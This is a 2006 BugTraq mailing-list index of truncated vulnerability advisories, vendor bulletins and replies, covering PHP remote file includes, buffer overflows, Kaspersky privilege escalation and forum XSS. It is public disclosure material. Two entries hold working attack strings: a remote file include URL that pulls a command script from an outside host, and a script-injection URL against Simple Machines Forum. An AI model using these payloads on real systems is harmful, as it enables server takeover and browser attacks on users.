BugTraq Mode:
[ GLSA 200610-09 ] libmusicbrainz: Multiple buffer overflows 2006-10-22
Matthias Geerdsen (vorlon gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200610-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
[USN-368-1] Qt vulnerability 2006-10-23
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-368-1 October 23, 2006
qt-x11-free vulnerability
CVE-2006-4811
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.

[ more ]  [ reply ]
Hustle Labs & MNIN eDirectory Vulnerability 2006-10-21
Ryan Smith (whatstheaddress gmail com)
As of 20-October-2006, Ryan Smith from Hustle Labs
(http://www.hustlelabs.com) and Michael Ligh from MNIN
(http://www.mnin.org) have released an advisory
detailing a vulnerability in Novell eDirectory HTTPStk. This
vulnerability occurs when processing HTTP Request headers and can be
triggered by a

[ more ]  [ reply ]
Virtual Law Office (phpc_root_path) Remote File Include Vulnerability 2006-10-21
xorontr gmail com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=

Virtual Law Office (phpc_root_path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=

Author: xoron

Tum islam aleminin Ramazan Ba

[ more ]  [ reply ]
Open Meetings Filing Application (PROJECT_ROOT) Remote File Include Vulnerability 2006-10-21
xorontr gmail com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=

Open Meetings Filing Application (PROJECT_ROOT) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=

Author: xoron

Tum islam aleminin

[ more ]  [ reply ]
Re: Simple Machines Forum (SMF) XSS issue 2006-10-21
mrapples gmail com
Good find on this.

Here is the fix I applied:

Find on line ~85 in Sources/Search.php:

foreach ($temp_params as $i => $data)
{
@list ($k, $v) = explode('|\'|', $data);
$context['search_params'][$k] = stripslashes($v);
}

Change to:

foreach ($temp_params as $i => $data)
{
@list ($k, $

[ more ]  [ reply ]
Re: iDefense Security Advisory 10.19.06: Kaspersky Labs Anti-Virus IOCTL Local Privilege Escalation Vulnerability 2006-10-20
Steven M. Christey (coley mitre org)

>Vendor response:
>http://www.kaspersky.com/technews?id=203038678

This only mentions KLIN.SYS, but the original iDEFENSE advisory lists
both KLIN and KLICK as attack vectors. Has the KLICK vector been
addressed as well?

- Steve

[ more ]  [ reply ]
Re: Flaw in Firefox 2.0 RC2 2006-10-20
Jure Pečar (pegasus nerv eu org)
On Thu, 19 Oct 2006 13:05:48 -0400
Mark A Basil <mark.basil (at) markmonitor (dot) com> wrote:

> It is also affecting any browser using the Gecko rendering engine
> (gecko-1.8 at least), such as Epiphany and Galeon, and not restricted to
> 'Firefox'.
>
> -m
>
> On Wed, 2006-10-18 at 10:28 +1000, jm wrote:
>

[ more ]  [ reply ]
[OpenPKG-SA-2006.025] OpenPKG Security Advisory (drupal) 2006-10-20
OpenPKG (openpkg openpkg org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

OpenPKG Security Advisory OpenPKG GmbH
http://www.openpkg.org/security/ http://openpkg.com
OpenPKG-SA-2006.025

[ more ]  [ reply ]
PHPLibrary-1.5.3(Description.php) Remote File Include 2006-10-20
arab_anaconda hotmail com
created by Anaconda

Exploit : http://victim.com/PHPLibrary-1.5.3/Description.php?cfg_dir=http://www.ar
ab4services.com/c-h.v2.txt?cmd

include ($lib_dir . "sqlstorage.class.php");

arab4services.com security team

[ more ]  [ reply ]
Advisory for Oneorzero helpdesk 2006-10-20
Mike Klingler (whitehatguru gmail com)
Permanent Link : http://www.whitedust.net/speaks/3043/

------------------------------------------------------------
- Advisory for OneOrZero Helpdesk -
------------------------------------------------------------
- OneOrZero Helpdesk -

AFFECTED PRODUCTS
=================
OneOrZero Helpdesk v

[ more ]  [ reply ]
PHP Poll Creator 1.04 (poll_vote.php)File Include 2006-10-20
mahmood ali (mah_k_2000 hotmail com)
###################################################
PHP Poll Creator 1.04 (poll_vote.php)File Include
###################################################

Source Code:
http://www.phppc.de/download/phppc_104.zip
###################################################

Vulnerable Code:_
include $relativ

[ more ]  [ reply ]
[security bulletin] HPSBTU02163 SSRT061223 rev.1 - HP Tru64 UNIX Running dtmail, Local Execution of Arbitrary Code 2006-10-20
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00793805
Version: 1

HPSBTU02163 SSRT061223 rev.1 - HP Tru64 UNIX Running dtmail, Local Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon

[ more ]  [ reply ]
[ GLSA 200610-08 ] Cscope: Multiple buffer overflows 2006-10-20
Raphael Marichez (falco gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200610-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
HPSBUX02162 SSRT061223 rev.1 - HP-UX Running dtmail, Local Execution of Arbitrary Code 2006-10-20
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00793091
Version: 1

HPSBUX02162 SSRT061223 rev.1 - HP-UX Running dtmail, Local Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon as possi

[ more ]  [ reply ]
Simple Machines Forum (SMF) XSS issue 2006-10-20
josecarlos norte gmail com

title: Simple Machines Forum (SMF) XSS issue
author: Jose Carlos Norte
discovered by: Jose Carlos Norte

1. introduction

Simple Machines Forum is a popular scalable free bulletin board system written in PHP over a MySQL database. The URL of the project:

http://www.simplemachines.org/

2. XSS proble

[ more ]  [ reply ]
[KAPDA::#60] Mambo V4.6.x vulnerabilities 2006-10-20
alireza hassani (trueend5 yahoo com)
KAPDA New advisory

Vendor: http://www.mamboserver.com
Vulnerable Versions: 4.6.x
Bug: XSS, Html Injection, Sql Injection
Exploitation: Remote with browser

Description:
--------------------
Mambo is a feature-rich dynamic portal engine/content
management tool capable of building sites from several

[ more ]  [ reply ]
[CAID 34693, 34694]: CA BrightStor ARCserve Backup Multiple Buffer Overflow Vulnerabilities (UPDATED) 2006-10-20
Williams, James K (James Williams ca com)


Our original fixes for the BrightStor ARCserve Backup
vulnerabilities that we publicly disclosed on 2006-10-05
(http://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=93775&date=2006/10)
did not completely resolve one of the vulnerabilities.

Consequently, we have released new f

[ more ]  [ reply ]
Re: iDefense Security Advisory 10.19.06: Kaspersky Labs Anti-Virus IOCTL Local Privilege Escalation Vulnerability 2006-10-20
abel andrade lycos com
Vendor response:
http://www.kaspersky.com/technews?id=203038678

[ more ]  [ reply ]
Re: PHP "exec", "system", "popen" (+small POC) 2006-10-20
Bernhard Mueller (research sec-consult com)
Hello,

This is not a new problem (see http://www.securityfocus.com/bid/9302).
However, we also "discovered" this a few weeks ago and contacted Apache
and PHP about it. According to Stefan Esser (PHP) it's due to Apache's
failure to open file descriptors with the close on exec flag. However,
accordin

[ more ]  [ reply ]
PHP Classifieds 7.1 - Remote File Include Vulnerability 2006-10-20
Le CoPrA hotmail com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# PHP Classifieds 7.1 - Remote File Include Vulnerability

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Download : http://softadmin.deltascripts.com/download_get.php?id=32

=-=-=-=-=-=-=-=-=-=-=-

[ more ]  [ reply ]
[Reversemode Advisory] Kaspersky Anti-Virus Privilege Escalation 2006-10-20
Reversemode (advisories reversemode com)

Hi,

Kaspersky Products are prone to a local privilege escalation.
Unprivileged users can exploit this flaw in order to execute arbitrary
code with Kernel privileges.

Kaspersky implements its NDIS-TDI Hooking Engine using two drivers,
which rely on an internal system of plugins. Plugin registering

[ more ]  [ reply ]
RE: Flaw in Firefox 2.0 RC2 2006-10-18
Aras "Russ" Memisyazici (arasm vt edu)
Oddly enough my IE6.0 patched to the hilt as of 10/18/06 froze and wouldn't
let me close. I had to kill it via Sysinternals' ProcessExplorer!

-----Original Message-----
From: jm [mailto:jm (at) hcn.com (dot) au]
Sent: Tuesday, October 17, 2006 8:28 PM
To: bugtraq (at) securityfocus (dot) com
Subject: Re: Flaw in Firefo

[ more ]  [ reply ]
iDefense Security Advisory 10.19.06: Kaspersky Labs Anti-Virus IOCTL Local Privilege Escalation Vulnerability 2006-10-19
iDefense Labs (labs-no-reply idefense com)
Kaspersky Labs Anti-Virus IOCTL Local Privilege Escalation Vulnerability

iDefense Security Advisory 10.19.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 19, 2006

I. BACKGROUND

Kaspersky Anti-Virus provides virus and spyware protection. More
information about Kaspersky Labs Anti-Viru

[ more ]  [ reply ]
[ MDKSA-2006:186 ] - Updated kdelibs packages fix KHTML vulnerability 2006-10-19
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:186
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]
TORQUE Spool Job Race condition (torque <= 2.0.0p8) 2006-10-18
Luís Miguel Silva (lms ispgaya pt)
Hello all,

Back in March I audited a software called TORQUE Resource Manager and found a
critical race condition vulnerability which could be used by malicious users to
escalate their privileges.

"TORQUE is an open source resource manager providing control over batch jobs and
distributed compute n

[ more ]  [ reply ]
Re: Flaw in Firefox 2.0 RC2 2006-10-19
Mark A Basil (mark basil markmonitor com)
It is also affecting any browser using the Gecko rendering engine
(gecko-1.8 at least), such as Epiphany and Galeon, and not restricted to
'Firefox'.

-m

On Wed, 2006-10-18 at 10:28 +1000, jm wrote:
> Firefox 1.5.07 on CentOS died quite nicely too.
>
> Mike (at) gmail (dot) com wrote:
> > http://lcamtuf.core

[ more ]  [ reply ]
[Xss] IN SMF 1.1 RC2 2006-10-19
the_free_kernel b0rizq net
#InFo
-----
# Site : www.simplemachines.org
# Dork : Powered by SMF 1.1 RC2
# File : index.php?
# By : b0rizQ
# E-Mail : The_FreE_KernEl (at) b0rizQ (dot) nET
--------------------------------
[Xss]

www.[traget].com/index.php?action=login2"><script>alert('xss-by-b0rizQ')
</script>
------------------------------

[ more ]  [ reply ]
RE: Flaw in Firefox 2.0 RC2 2006-10-19
Sean Warnock (swarnock warnocksolutions com)
-----Original Message-----
From: Mike (at) gmail (dot) com [mailto:Mike (at) gmail (dot) com]
Sent: Tuesday, October 17, 2006 2:10 AM
To: bugtraq (at) securityfocus (dot) com
Subject: Flaw in Firefox 2.0 RC2

http://lcamtuf.coredump.cx/ffoxdie.html
this exploit still works with the latest Firefox 2.0 RC3

Hmmm after a quickie chec

[ more ]  [ reply ]
Re: PHPRecipeBook <= 2.35 ((g_rb_basedir)) Remote File Include Exploit 2006-10-19
theif gmail com
You sad pos, r0ut3r posted this ages ago!
contact here writ3r (at) gmail (dot) com
proof here http://milw0rm.com/exploits/2584
nuff said tool

[ more ]  [ reply ]
Copyright 2010, SecurityFocus